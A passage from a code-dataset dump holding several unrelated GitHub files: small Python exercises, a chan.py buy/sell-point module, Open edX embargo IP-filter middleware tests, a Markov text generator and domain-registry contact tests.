'autoru'}}]\n\n\n@pytest.mark.parametrize('current_cluster,available_clusters,expected_cluster,is_exception', [\n ['hahn', '[\"hahn\", \"arnold\"]', 'hahn', False],\n ['hahn', '[\"arnold\"]', 'arnold', False],\n ['hahn', None, 'hahn', False],\n ['hahn', '[]', 'hahn', True],\n])\ndef test_get_available_yt_cluster(current_cluster, available_clusters, expected_cluster, is_exception):\n if not is_exception:\n assert expected_cluster == get_available_yt_cluster(current_cluster, available_clusters)\n else:\n with pytest.raises(Exception):\n get_available_yt_cluster(current_cluster, available_clusters)\n","repo_name":"Alexander-Berg/2022-tests-examples","sub_path":"antiadblock/tests/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":7683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"10447441478","text":"\n# Declarando as variáveis\na = 2\nb = 3\n\n# Montando o if-elif-else\nif a == b:\n print('A é igual a B')\nelif a < b:\n print('A é menor do B')\nelse:\n print('A maior do que B')\n","repo_name":"AlexandreNonato78/Exercicios_Python_GuanabaraM1","sub_path":"pacote-download/Exercicios/04declarandoVariaveis.py","file_name":"04declarandoVariaveis.py","file_ext":"py","file_size_in_byte":177,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"43283294930","text":"import sys\nsys.stdin = open(\"04_creditcard_1.txt\")\n\nfor t in range(1, int(input()) + 1):\n num_list = list(map(int,input().split()))\n total = 0\n for i in range(1, 16):\n if i % 2 == 1:\n total += (num_list[i-1]*2)\n else:\n total += num_list[i-1]\n N = 10 - (total % 10)\n if N == 10:\n N = 0\n print(f'#{t} {N}')\n","repo_name":"OIIUOI/Multicampus","sub_path":"220729/04.py","file_name":"04.py","file_ext":"py","file_size_in_byte":366,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"2768970975","text":"from typing import Generic, List, Optional, TypeVar, Union, overload\n\nfrom Bi.Bi import CBi\nfrom Bi.BiList import CBiList\nfrom Common.CEnum import 
BSP_TYPE\nfrom Common.func_util import has_overlap\nfrom Seg.Seg import CSeg\nfrom Seg.SegListComm import CSegListComm\nfrom ZS.ZS import CZS\n\nfrom .BS_Point import CBS_Point\nfrom .BSPointConfig import CBSPointConfig, CPointConfig\n\nLINE_TYPE = TypeVar('LINE_TYPE', CBi, CSeg[CBi])\nLINE_LIST_TYPE = TypeVar('LINE_LIST_TYPE', CBiList, CSegListComm[CBi])\n\n\nclass CBSPointList(Generic[LINE_TYPE, LINE_LIST_TYPE]):\n def __init__(self, bs_point_config: CBSPointConfig):\n self.lst: List[CBS_Point[LINE_TYPE]] = []\n self.bsp1_lst: List[CBS_Point[LINE_TYPE]] = []\n self.config = bs_point_config\n self.last_sure_pos = -1\n\n def __iter__(self):\n yield from self.lst\n\n def __len__(self):\n return len(self.lst)\n\n @overload\n def __getitem__(self, index: int) -> CBS_Point: ...\n\n @overload\n def __getitem__(self, index: slice) -> List[CBS_Point]: ...\n\n def __getitem__(self, index: Union[slice, int]) -> Union[List[CBS_Point], CBS_Point]:\n return self.lst[index]\n\n def cal(self, bi_list: LINE_LIST_TYPE, seg_list: CSegListComm[LINE_TYPE]):\n self.lst = [bsp for bsp in self.lst if bsp.klu.idx <= self.last_sure_pos]\n self.bsp1_lst = [bsp for bsp in self.bsp1_lst if bsp.klu.idx <= self.last_sure_pos]\n\n self.cal_seg_bs1point(seg_list, bi_list)\n self.cal_seg_bs2point(seg_list, bi_list)\n self.cal_seg_bs3point(seg_list, bi_list)\n\n self.update_last_pos(seg_list)\n\n def update_last_pos(self, seg_list: CSegListComm):\n self.last_sure_pos = -1\n for seg in seg_list[::-1]:\n if seg.is_sure:\n self.last_sure_pos = seg.end_bi.get_begin_klu().idx\n return\n\n def seg_need_cal(self, seg: CSeg):\n return seg.end_bi.get_end_klu().idx > self.last_sure_pos\n\n def add_bs(\n self,\n bs_type: BSP_TYPE,\n bi: LINE_TYPE,\n relate_bsp1: Optional[CBS_Point],\n is_target_bsp: bool = True,\n feature_dict=None,\n ):\n is_buy = bi.is_down()\n for exist_bsp in self.lst:\n if exist_bsp.klu.idx == bi.get_end_klu().idx:\n assert exist_bsp.is_buy == is_buy\n exist_bsp.add_another_bsp_prop(bs_type, relate_bsp1)\n return\n if bs_type not in self.config.GetBSConfig(is_buy).target_types:\n is_target_bsp = False\n\n if is_target_bsp or bs_type in [BSP_TYPE.T1, BSP_TYPE.T1P]:\n bsp = CBS_Point[LINE_TYPE](\n bi=bi,\n is_buy=is_buy,\n bs_type=bs_type,\n relate_bsp1=relate_bsp1,\n feature_dict=feature_dict,\n )\n else:\n return\n if is_target_bsp:\n self.lst.append(bsp)\n if bs_type in [BSP_TYPE.T1, BSP_TYPE.T1P]:\n self.bsp1_lst.append(bsp)\n\n def cal_seg_bs1point(self, seg_list: CSegListComm[LINE_TYPE], bi_list: LINE_LIST_TYPE):\n for seg in seg_list:\n if not self.seg_need_cal(seg):\n continue\n self.cal_single_bs1point(seg, bi_list)\n\n def cal_single_bs1point(self, seg: CSeg[LINE_TYPE], bi_list: LINE_LIST_TYPE):\n BSP_CONF = self.config.GetBSConfig(seg.is_down())\n zs_cnt = seg.get_multi_bi_zs_cnt() if BSP_CONF.bsp1_only_multibi_zs else len(seg.zs_lst)\n is_target_bsp = (BSP_CONF.min_zs_cnt <= 0 or zs_cnt >= BSP_CONF.min_zs_cnt)\n if len(seg.zs_lst) > 0 and \\\n not seg.zs_lst[-1].is_one_bi_zs() and \\\n ((seg.zs_lst[-1].bi_out and seg.zs_lst[-1].bi_out.idx >= seg.end_bi.idx) or seg.zs_lst[-1].bi_lst[-1].idx >= seg.end_bi.idx) \\\n and seg.end_bi.idx - seg.zs_lst[-1].get_bi_in().idx > 2:\n self.treat_bsp1(seg, BSP_CONF, is_target_bsp)\n else:\n self.treat_pz_bsp1(seg, BSP_CONF, bi_list, is_target_bsp)\n\n def treat_bsp1(self, seg: CSeg[LINE_TYPE], BSP_CONF: CPointConfig, is_target_bsp: bool):\n last_zs = seg.zs_lst[-1]\n break_peak, _ = last_zs.out_bi_is_peak(seg.end_bi.idx)\n if BSP_CONF.bs1_peak and not break_peak:\n 
is_target_bsp = False\n is_diver, divergence_rate = last_zs.is_divergence(BSP_CONF, out_bi=seg.end_bi)\n if not is_diver:\n is_target_bsp = False\n feature_dict = {'divergence_rate': divergence_rate}\n self.add_bs(bs_type=BSP_TYPE.T1, bi=seg.end_bi, relate_bsp1=None, is_target_bsp=is_target_bsp, feature_dict=feature_dict)\n\n def treat_pz_bsp1(self, seg: CSeg[LINE_TYPE], BSP_CONF: CPointConfig, bi_list: LINE_LIST_TYPE, is_target_bsp):\n last_bi = seg.end_bi\n pre_bi = bi_list[last_bi.idx-2]\n if last_bi.seg_idx != pre_bi.seg_idx:\n return\n if last_bi.dir != seg.dir:\n return\n if last_bi.is_down() and last_bi._low() > pre_bi._low(): # 创新低\n return\n if last_bi.is_up() and last_bi._high() < pre_bi._high(): # 创新高\n return\n in_metric = pre_bi.cal_macd_metric(BSP_CONF.macd_algo, is_reverse=False)\n out_metric = last_bi.cal_macd_metric(BSP_CONF.macd_algo, is_reverse=True)\n is_diver, divergence_rate = out_metric <= BSP_CONF.divergence_rate*in_metric, out_metric/(in_metric+1e-7)\n if not is_diver:\n is_target_bsp = False\n if isinstance(bi_list, CBiList):\n assert isinstance(last_bi, CBi) and isinstance(pre_bi, CBi)\n feature_dict = {'divergence_rate': divergence_rate}\n self.add_bs(bs_type=BSP_TYPE.T1P, bi=last_bi, relate_bsp1=None, is_target_bsp=is_target_bsp, feature_dict=feature_dict)\n\n def cal_seg_bs2point(self, seg_list: CSegListComm[LINE_TYPE], bi_list: LINE_LIST_TYPE):\n bsp1_bi_idx_dict = {bsp.bi.idx: bsp for bsp in self.bsp1_lst}\n for seg in seg_list:\n self.treat_bsp2(seg, bsp1_bi_idx_dict, seg_list, bi_list)\n\n def treat_bsp2(self, seg: CSeg, bsp1_bi_idx_dict, seg_list: CSegListComm[LINE_TYPE], bi_list: LINE_LIST_TYPE):\n if not self.seg_need_cal(seg):\n return\n if len(seg_list) > 1:\n BSP_CONF = self.config.GetBSConfig(seg.is_down())\n bsp1_bi = seg.end_bi\n bsp1_bi_idx = bsp1_bi.idx\n real_bsp1 = bsp1_bi_idx_dict.get(bsp1_bi.idx)\n if bsp1_bi.idx + 2 >= len(bi_list):\n return\n break_bi = bi_list[bsp1_bi.idx + 1]\n bsp2_bi = bi_list[bsp1_bi.idx + 2]\n else:\n BSP_CONF = self.config.GetBSConfig(seg.is_up())\n bsp1_bi, real_bsp1 = None, None\n bsp1_bi_idx = -1\n if len(bi_list) == 1:\n return\n bsp2_bi = bi_list[1]\n break_bi = bi_list[0]\n if BSP_CONF.bsp2_follow_1 and bsp1_bi_idx not in bsp1_bi_idx_dict: # check bsp2_follow_1\n return\n retrace_rate = bsp2_bi.amp()/break_bi.amp()\n bsp2_flag = retrace_rate <= BSP_CONF.max_bs2_rate\n if bsp2_flag:\n self.add_bs(bs_type=BSP_TYPE.T2, bi=bsp2_bi, relate_bsp1=real_bsp1) # type: ignore\n elif BSP_CONF.bsp2s_follow_2:\n return\n self.treat_bsp2s(seg_list, bi_list, bsp2_bi, break_bi, real_bsp1, BSP_CONF) # type: ignore\n\n def treat_bsp2s(\n self,\n seg_list: CSegListComm,\n bi_list: LINE_LIST_TYPE,\n bsp2_bi: LINE_TYPE,\n break_bi: LINE_TYPE,\n real_bsp1: Optional[CBS_Point],\n BSP_CONF: CPointConfig,\n ):\n bias = 2\n _low, _high = None, None\n while bsp2_bi.idx + bias < len(bi_list): # 计算类二\n bsp2s_bi = bi_list[bsp2_bi.idx + bias]\n assert bsp2s_bi.seg_idx is not None and bsp2_bi.seg_idx is not None\n if BSP_CONF.max_bsp2s_lv is not None and bias/2 > BSP_CONF.max_bsp2s_lv:\n break\n if bsp2s_bi.seg_idx != bsp2_bi.seg_idx and (bsp2s_bi.seg_idx < len(seg_list)-1 or seg_list[bsp2_bi.seg_idx].is_sure):\n break\n if bias == 2:\n if not has_overlap(bsp2_bi._low(), bsp2_bi._high(), bsp2s_bi._low(), bsp2s_bi._high()):\n break\n _low = max([bsp2_bi._low(), bsp2s_bi._low()])\n _high = min([bsp2_bi._high(), bsp2s_bi._high()])\n elif not has_overlap(_low, _high, bsp2s_bi._low(), bsp2s_bi._high()):\n break\n\n if bsp2s_break_bsp1(bsp2s_bi, 
break_bi):\n break\n retrace_rate = abs(bsp2s_bi.get_end_val()-break_bi.get_end_val())/break_bi.amp()\n if retrace_rate > BSP_CONF.max_bs2_rate:\n break\n\n self.add_bs(bs_type=BSP_TYPE.T2S, bi=bsp2s_bi, relate_bsp1=real_bsp1) # type: ignore\n bias += 2\n\n def cal_seg_bs3point(self, seg_list: CSegListComm[LINE_TYPE], bi_list: LINE_LIST_TYPE):\n bsp1_bi_idx_dict = {bsp.bi.idx: bsp for bsp in self.bsp1_lst}\n for seg in seg_list:\n if not self.seg_need_cal(seg):\n continue\n if len(seg_list) > 1:\n bsp1_bi = seg.end_bi\n bsp1_bi_idx = bsp1_bi.idx\n BSP_CONF = self.config.GetBSConfig(seg.is_down())\n real_bsp1 = bsp1_bi_idx_dict.get(bsp1_bi.idx)\n next_seg_idx = seg.idx+1\n next_seg = seg.next # 可能为None, 所以并不一定可以保证next_seg_idx == next_seg.idx\n else:\n next_seg = seg\n next_seg_idx = seg.idx\n bsp1_bi, real_bsp1 = None, None\n bsp1_bi_idx = -1\n BSP_CONF = self.config.GetBSConfig(seg.is_up())\n if BSP_CONF.bsp3_follow_1 and bsp1_bi_idx not in bsp1_bi_idx_dict:\n continue\n if next_seg:\n self.treat_bsp3_after(seg_list, next_seg, BSP_CONF, bi_list, real_bsp1, bsp1_bi_idx, next_seg_idx)\n self.treat_bsp3_before(seg_list, seg, next_seg, bsp1_bi, BSP_CONF, bi_list, real_bsp1, next_seg_idx)\n\n def treat_bsp3_after(\n self,\n seg_list: CSegListComm[LINE_TYPE],\n next_seg: CSeg[LINE_TYPE],\n BSP_CONF: CPointConfig,\n bi_list: LINE_LIST_TYPE,\n real_bsp1,\n bsp1_bi_idx,\n next_seg_idx\n ):\n first_zs = next_seg.get_first_multi_bi_zs()\n if first_zs is None:\n return\n if BSP_CONF.strict_bsp3 and first_zs.get_bi_in().idx != bsp1_bi_idx+1:\n return\n if first_zs.bi_out is None or first_zs.bi_out.idx+1 >= len(bi_list):\n return\n bsp3_bi = bi_list[first_zs.bi_out.idx+1]\n if bsp3_bi.parent_seg is None:\n if next_seg.idx != len(seg_list)-1:\n return\n elif bsp3_bi.parent_seg.idx != next_seg.idx:\n return\n if bsp3_bi.dir == next_seg.dir:\n return\n if bsp3_bi.seg_idx != next_seg_idx and next_seg_idx < len(seg_list)-2:\n return\n if bsp3_back2zs(bsp3_bi, first_zs):\n return\n bsp3_peak_zs = bsp3_break_zspeak(bsp3_bi, first_zs)\n if BSP_CONF.bsp3_peak and not bsp3_peak_zs:\n return\n self.add_bs(bs_type=BSP_TYPE.T3A, bi=bsp3_bi, relate_bsp1=real_bsp1) # type: ignore\n\n def treat_bsp3_before(\n self,\n seg_list: CSegListComm[LINE_TYPE],\n seg: CSeg[LINE_TYPE],\n next_seg: Optional[CSeg[LINE_TYPE]],\n bsp1_bi: Optional[LINE_TYPE],\n BSP_CONF: CPointConfig,\n bi_list: LINE_LIST_TYPE,\n real_bsp1,\n next_seg_idx\n ):\n cmp_zs = seg.get_final_multi_bi_zs()\n if cmp_zs is None:\n return\n if not bsp1_bi:\n return\n if BSP_CONF.strict_bsp3 and (cmp_zs.bi_out is None or cmp_zs.bi_out.idx != bsp1_bi.idx):\n return\n end_bi_idx = cal_bsp3_bi_end_idx(next_seg)\n for bsp3_bi in bi_list[bsp1_bi.idx+2::2]:\n if bsp3_bi.idx > end_bi_idx:\n break\n assert bsp3_bi.seg_idx is not None\n if bsp3_bi.seg_idx != next_seg_idx and bsp3_bi.seg_idx < len(seg_list)-1:\n break\n if bsp3_back2zs(bsp3_bi, cmp_zs): # type: ignore\n continue\n self.add_bs(bs_type=BSP_TYPE.T3B, bi=bsp3_bi, relate_bsp1=real_bsp1) # type: ignore\n break\n\n def getLastestBspList(self) -> List[CBS_Point[LINE_TYPE]]:\n if len(self.lst) == 0:\n return []\n return sorted(self.lst, key=lambda bsp: bsp.bi.idx, reverse=True)\n\n\ndef bsp2s_break_bsp1(bsp2s_bi: LINE_TYPE, bsp2_break_bi: LINE_TYPE) -> bool:\n return (bsp2s_bi.is_down() and bsp2s_bi._low() < bsp2_break_bi._low()) or \\\n (bsp2s_bi.is_up() and bsp2s_bi._high() > bsp2_break_bi._high())\n\n\ndef bsp3_back2zs(bsp3_bi: LINE_TYPE, zs: CZS) -> bool:\n return (bsp3_bi.is_down() and bsp3_bi._low() < 
zs.high) or (bsp3_bi.is_up() and bsp3_bi._high() > zs.low)\n\n\ndef bsp3_break_zspeak(bsp3_bi: LINE_TYPE, zs: CZS) -> bool:\n return (bsp3_bi.is_down() and bsp3_bi._high() >= zs.peak_high) or (bsp3_bi.is_up() and bsp3_bi._low() <= zs.peak_low)\n\n\ndef cal_bsp3_bi_end_idx(seg: Optional[CSeg[LINE_TYPE]]):\n if not seg:\n return float(\"inf\")\n if seg.get_multi_bi_zs_cnt() == 0 and seg.next is None:\n return float(\"inf\")\n end_bi_idx = seg.end_bi.idx-1\n for zs in seg.zs_lst:\n if zs.is_one_bi_zs():\n continue\n if zs.bi_out is not None:\n end_bi_idx = zs.bi_out.idx\n break\n return end_bi_idx\n","repo_name":"Vespa314/chan.py","sub_path":"BuySellPoint/BSPointList.py","file_name":"BSPointList.py","file_ext":"py","file_size_in_byte":13562,"program_lang":"python","lang":"en","doc_type":"code","stars":382,"dataset":"github-code","pt":"3"} +{"seq_id":"12613994303","text":"\"\"\"\nTests for EmbargoMiddleware with CountryAccessRules\n\"\"\"\n\n\nfrom unittest.mock import patch\nimport ddt\nfrom config_models.models import cache as config_cache\nfrom django.conf import settings\nfrom django.core.cache import cache as django_cache\nfrom django.urls import reverse\nfrom edx_toggles.toggles.testutils import override_waffle_switch\nfrom xmodule.modulestore.tests.django_utils import ModuleStoreTestCase\nfrom xmodule.modulestore.tests.factories import CourseFactory\n\nfrom common.djangoapps.student.tests.factories import UserFactory\nfrom common.djangoapps.util.testing import UrlResetMixin\nfrom openedx.core.djangoapps.util.legacy_ip import USE_LEGACY_IP\nfrom openedx.core.djangolib.testing.utils import skip_unless_lms\n\nfrom ..models import IPFilter, RestrictedCourse\nfrom ..test_utils import restrict_course\n\n\n@ddt.ddt\n@skip_unless_lms\nclass EmbargoMiddlewareAccessTests(UrlResetMixin, ModuleStoreTestCase):\n \"\"\"Tests of embargo middleware country access rules.\n\n There are detailed unit tests for the rule logic in\n `test_api.py`; here, we're mainly testing the integration\n with middleware\n\n \"\"\"\n USERNAME = 'fred'\n PASSWORD = 'secret'\n\n URLCONF_MODULES = ['openedx.core.djangoapps.embargo']\n\n @patch.dict(settings.FEATURES, {'EMBARGO': True})\n def setUp(self):\n super().setUp()\n self.user = UserFactory(username=self.USERNAME, password=self.PASSWORD)\n self.course = CourseFactory.create()\n self.client.login(username=self.USERNAME, password=self.PASSWORD)\n\n self.courseware_url = reverse('about_course', kwargs={'course_id': str(self.course.id)})\n self.non_courseware_url = reverse('dashboard')\n\n # Clear the cache to avoid interference between tests\n django_cache.clear()\n config_cache.clear()\n\n @patch.dict(settings.FEATURES, {'EMBARGO': True})\n @ddt.data(True, False)\n def test_blocked(self, disable_access_check):\n with restrict_course(self.course.id, access_point='courseware', disable_access_check=disable_access_check) as redirect_url: # pylint: disable=line-too-long\n response = self.client.get(self.courseware_url)\n if disable_access_check:\n assert response.status_code == 200\n else:\n self.assertRedirects(response, redirect_url)\n\n @patch.dict(settings.FEATURES, {'EMBARGO': True})\n def test_allowed(self):\n # Add the course to the list of restricted courses\n # but don't create any access rules\n RestrictedCourse.objects.create(course_key=self.course.id)\n\n # Expect that we can access courseware\n response = self.client.get(self.courseware_url)\n assert response.status_code == 200\n\n @patch.dict(settings.FEATURES, {'EMBARGO': True})\n def 
test_non_courseware_url(self):\n with restrict_course(self.course.id):\n response = self.client.get(self.non_courseware_url)\n assert response.status_code == 200\n\n @patch.dict(settings.FEATURES, {'EMBARGO': True})\n @ddt.data(\n # request ip chain, blacklist, whitelist, is_enabled, allow_access\n (['192.178.2.3'], [], [], True, True), # confirm that test setup & no config allows users by default\n (['173.194.123.35'], ['173.194.123.35'], [], True, False),\n (['173.194.123.35'], ['173.194.0.0/16'], [], True, False),\n (['173.194.123.35'], ['127.0.0.0/32', '173.194.0.0/16'], [], True, False),\n (['173.195.10.20'], ['173.194.0.0/16'], [], True, True),\n (['173.194.123.35'], ['173.194.0.0/16'], ['173.194.0.0/16'], True, False), # blacklist checked before whitelist\n (['173.194.123.35', '192.178.2.3'], ['173.194.123.35'], [], True, False), # earlier ip can still be blocked\n (['173.194.123.35'], ['173.194.123.35'], [], False, True), # blacklist disabled\n )\n @ddt.unpack\n def test_ip_blacklist_rules(self, request_ips, blacklist, whitelist, is_enabled, allow_access):\n # Ensure that IP blocking works for anonymous users\n self.client.logout()\n\n # Set up the IP rules\n IPFilter.objects.create(\n blacklist=\", \".join(blacklist),\n whitelist=\", \".join(whitelist),\n enabled=is_enabled\n )\n\n # Check that access is enforced\n response = self.client.get(\n self.courseware_url,\n HTTP_X_FORWARDED_FOR=','.join(request_ips),\n REMOTE_ADDR=request_ips[-1],\n )\n\n if allow_access:\n assert response.status_code == 200\n else:\n redirect_url = reverse(\n 'embargo:blocked_message',\n kwargs={\n 'access_point': 'courseware',\n 'message_key': 'embargo'\n }\n )\n self.assertRedirects(response, redirect_url)\n\n @patch.dict(settings.FEATURES, {'EMBARGO': True})\n @ddt.data(\n # request ip chain, blacklist, whitelist, is_enabled, allow_access\n (['192.178.2.3'], [], [], True, False), # confirm that test setup & no config blocks users by default\n (['173.194.123.35', '192.178.2.3'], [], ['173.194.123.35'], True, False), # whitelist only looks at last ip\n (['192.178.2.3', '173.194.123.35'], [], ['173.194.0.0/16'], True, True),\n (['192.178.2.3'], [], ['173.194.0.0/16'], True, False),\n (['173.194.123.35'], [], ['173.194.123.35'], False, False), # whitelist disabled\n )\n @ddt.unpack\n def test_ip_whitelist_rules(self, request_ips, blacklist, whitelist, is_enabled, allow_access):\n # Ensure that IP blocking works for anonymous users\n self.client.logout()\n\n # Set up the IP rules\n IPFilter.objects.create(\n blacklist=\", \".join(blacklist),\n whitelist=\", \".join(whitelist),\n enabled=is_enabled\n )\n\n # Check that access is enforced (restrict course by default, so that allow-list logic is actually tested)\n with restrict_course(self.course.id):\n response = self.client.get(\n self.courseware_url,\n HTTP_X_FORWARDED_FOR=','.join(request_ips),\n REMOTE_ADDR=request_ips[-1],\n )\n\n if allow_access:\n assert response.status_code == 200\n else:\n redirect_url = reverse(\n 'embargo:blocked_message',\n kwargs={\n 'access_point': 'courseware',\n 'message_key': 'default'\n }\n )\n self.assertRedirects(response, redirect_url)\n\n @patch.dict(settings.FEATURES, {'EMBARGO': True})\n @override_waffle_switch(USE_LEGACY_IP, True)\n @ddt.data(\n # request ip chain, blacklist, whitelist, allow_access\n (['192.178.2.3'], [], [], False), # confirm that test setup & no config blocks users by default\n (['173.194.123.35', '192.178.2.3'], [], ['192.178.2.3'], False), # whitelist ignores last (safest) ip\n 
(['173.194.123.35', '192.178.2.3'], [], ['173.194.0.0/16'], True), # whitelist does look at first ip though\n )\n @ddt.unpack\n def test_ip_legacy_whitelist_rules(self, request_ips, blacklist, whitelist, allow_access):\n # Ensure that IP blocking works for anonymous users\n self.client.logout()\n\n # Set up the IP rules\n IPFilter.objects.create(\n blacklist=\", \".join(blacklist),\n whitelist=\", \".join(whitelist),\n enabled=True,\n )\n\n # Check that access is enforced (restrict course by default, so that allow-list logic is actually tested)\n with restrict_course(self.course.id):\n response = self.client.get(\n self.courseware_url,\n HTTP_X_FORWARDED_FOR=','.join(request_ips),\n REMOTE_ADDR=request_ips[-1],\n )\n\n if allow_access:\n assert response.status_code == 200\n else:\n redirect_url = reverse(\n 'embargo:blocked_message',\n kwargs={\n 'access_point': 'courseware',\n 'message_key': 'default',\n }\n )\n self.assertRedirects(response, redirect_url)\n\n @patch.dict(settings.FEATURES, {'EMBARGO': True})\n @override_waffle_switch(USE_LEGACY_IP, True)\n @ddt.data(\n # request ip chain, blacklist, whitelist, allow_access\n (['192.178.2.3'], [], [], True), # confirm that test setup & no config allows users by default\n (['173.194.123.35', '192.178.2.3'], ['192.178.2.3'], [], True), # blacklist ignores last (safest) ip\n (['173.194.123.35', '192.178.2.3'], ['173.194.123.35'], [], False), # blacklist looks at first though\n (['192.178.2.3'], ['192.178.2.3'], ['192.178.2.3'], False), # blacklist overrides whitelist\n )\n @ddt.unpack\n def test_ip_legacy_blacklist_rules(self, request_ips, blacklist, whitelist, allow_access):\n # Ensure that IP blocking works for anonymous users\n self.client.logout()\n\n # Set up the IP rules\n IPFilter.objects.create(\n blacklist=\", \".join(blacklist),\n whitelist=\", \".join(whitelist),\n enabled=True,\n )\n\n # Check that access is enforced\n response = self.client.get(\n self.courseware_url,\n HTTP_X_FORWARDED_FOR=','.join(request_ips),\n REMOTE_ADDR=request_ips[-1],\n )\n\n if allow_access:\n assert response.status_code == 200\n else:\n redirect_url = reverse(\n 'embargo:blocked_message',\n kwargs={\n 'access_point': 'courseware',\n 'message_key': 'embargo',\n }\n )\n self.assertRedirects(response, redirect_url)\n\n @patch.dict(settings.FEATURES, {'EMBARGO': True})\n @ddt.data(\n ('courseware', 'default'),\n ('courseware', 'embargo'),\n ('enrollment', 'default'),\n ('enrollment', 'embargo')\n )\n @ddt.unpack\n def test_always_allow_access_to_embargo_messages(self, access_point, msg_key):\n # Blacklist an IP address\n IPFilter.objects.create(\n blacklist=\"192.168.10.20\",\n enabled=True\n )\n\n url = reverse(\n 'embargo:blocked_message',\n kwargs={\n 'access_point': access_point,\n 'message_key': msg_key\n }\n )\n response = self.client.get(\n url,\n HTTP_X_FORWARDED_FOR=\"192.168.10.20\",\n REMOTE_ADDR=\"192.168.10.20\"\n )\n assert response.status_code == 200\n","repo_name":"openedx/edx-platform","sub_path":"openedx/core/djangoapps/embargo/tests/test_middleware.py","file_name":"test_middleware.py","file_ext":"py","file_size_in_byte":10662,"program_lang":"python","lang":"en","doc_type":"code","stars":6774,"dataset":"github-code","pt":"3"} +{"seq_id":"33177669782","text":"#\n# ps8pr2.py (Problem Set 8, Problem 2)\n#\n# Markov text generation \n#\n\nimport random\n\n# Function 1\ndef create_dictionary(filename):\n \"\"\" returns a dictionary of key-value pairs in which:\n each key is a word encountered in the text file and\n the corresponding value is 
a list of words that follow \n the key word in the text file \"\"\"\n file = open(filename, 'r')\n text = file.read()\n file.close()\n \n words = text.split()\n d = {}\n current_word = '$'\n \n for word in words:\n if current_word not in d:\n d[current_word] = [word]\n else:\n d[current_word] += [word]\n if word[-1] in '.?!':\n current_word = '$'\n else:\n current_word = word\n \n return d\n\n# Function 2\ndef generate_text(word_dict, num_words):\n \"\"\" takes as parameters a dictionary of word transitions \n (generated by the create_dictionary function) named \n word_dict and a positive integer named num_words. \"\"\"\n current_word = '$'\n \n for i in range(num_words):\n wordlist = word_dict[current_word]\n next_word = random.choice(wordlist)\n print(next_word, end=' ')\n \n if next_word[-1] in '.?!':\n current_word = '$'\n else:\n current_word = next_word\n\n","repo_name":"Tim4316/CS-111-Python-","sub_path":"Problem Sets/PS 8/ps8pr2.py","file_name":"ps8pr2.py","file_ext":"py","file_size_in_byte":1309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"7153969653","text":"from unittest.mock import patch, ANY\nfrom .test_setup import TestSetup\nfrom ..exceptions import InvalidTld\nfrom ..utilities.domain import parse_domain\nfrom ..entity_management.contacts import (\n RegistrantManager,\n ContactAction\n)\nfrom ..models import (\n RegisteredDomain,\n)\nfrom ..entity_management.domains import DomainManager\nimport domain_api\n\n\nclass MockRpcClient(domain_api.epp.entity.EppRpcClient):\n def __init__(self, host=None):\n pass\n\nclass TestContactManager(TestSetup):\n \"\"\"\n Test contact management stuff.\n \"\"\"\n\n @patch('domain_api.epp.entity.EppRpcClient', new=MockRpcClient)\n def test_create_contact_payload(self):\n registrant_factory = RegistrantManager(\n provider=self.centralnic_test,\n template=self.joe_user,\n user=self.test_customer_user\n )\n create_return_value = {\n \"id\": \"A1234\",\n \"create_date\": \"2017-03-01T12:00:00Z\"\n }\n\n with patch.object(ContactAction,\n 'create',\n return_value=create_return_value) as mocked:\n registrant = registrant_factory.create_registry_contact()\n\n actual_data = {\n 'id': ANY,\n 'voice': '+1.8175551234',\n 'fax': '',\n 'email': 'joeuser@test.com',\n 'postalInfo': {\n 'name': 'Joe User',\n 'org': '',\n 'type': 'loc',\n 'addr': {\n 'street': ['10 Evergreen Terrace'],\n 'city': 'Springfield',\n 'sp': 'State',\n 'pc': '97835',\n 'cc': 'US'}\n },\n 'disclose': {\n 'flag': 0,\n 'disclosing': [\n {'name': 'name', 'type': 'loc'},\n {'name': 'org', 'type': 'loc'},\n {'name': 'addr', 'type': 'loc'},\n 'voice', 'fax', 'email'\n ]\n }\n }\n mocked.assert_called_with('centralnic-test', actual_data)\n self.assertEqual(self.joe_user.id,\n registrant.account_template.id,\n 'Account template is equal')\n\n @patch('domain_api.epp.entity.EppRpcClient', new=MockRpcClient)\n def test_update_postal_data(self):\n registrant_factory = RegistrantManager(contact=\"registrant-123\")\n update_return_value = {}\n update_contact_data = {\n \"name\": \"Joe Luser\",\n \"city\": \"Shelbeyville\",\n \"state\": \"Flyover\",\n \"telephone\": \"+1.8172221233\",\n \"non_disclose\": [\n \"name\",\n \"address\",\n \"company\",\n \"telephone\",\n \"email\",\n \"fax\"\n ],\n \"disclose_email\": True,\n \"status\": \"ok;clientHappy;linked\"\n }\n\n with patch.object(ContactAction,\n 'update',\n return_value=update_return_value) as mocked:\n registrant_factory.update_contact(update_contact_data)\n\n actual_data = {\n 
'id': \"registrant-123\",\n 'chg': {\n 'postalInfo': {\n 'name': 'Joe Luser',\n 'type': 'loc',\n 'addr': {\n 'city': 'Shelbeyville',\n 'sp': 'Flyover',\n 'cc': 'US'\n }\n },\n 'voice': '+1.8172221233',\n 'disclose': {\n 'flag': 0,\n 'disclosing': [\n {\"name\": \"name\", \"type\": \"loc\"},\n {\"name\": \"org\", \"type\": \"loc\"},\n {\"name\": \"addr\", \"type\": \"loc\"},\n 'voice',\n 'fax',\n 'email'\n ]\n }\n },\n 'add': ['ok', 'clientHappy', 'linked']\n }\n mocked.assert_called_with('centralnic-test', actual_data)\n\n\nclass TestDomainManager(TestSetup):\n \"\"\"\n Test domain management stuff.\n \"\"\"\n\n def setUp(self):\n \"\"\"\n Setup test suite\n \"\"\"\n super().setUp()\n self.registered_domain = RegisteredDomain.objects.get(\n name=\"test-something\",\n tld__zone=\"bar\",\n active=True\n )\n\n\n def test_parse_domain_components(self):\n \"\"\"\n Request for domains with a specific tld should return a manager\n that can handle the tld.\n \"\"\"\n parsed_domain = parse_domain(\"somedomain.ote\")\n self.assertEqual(parsed_domain[\"domain\"], \"somedomain\")\n self.assertEqual(parsed_domain[\"zone\"], \"ote\")\n parsed_domain = parse_domain(\"some.other.ote\")\n self.assertEqual(parsed_domain[\"domain\"], \"other\")\n self.assertEqual(parsed_domain[\"zone\"], \"ote\")\n\n def test_invalid_tld(self):\n \"\"\"\n Should throw an invalid tld exception when tld does not exist.\n \"\"\"\n with self.assertRaises(InvalidTld):\n 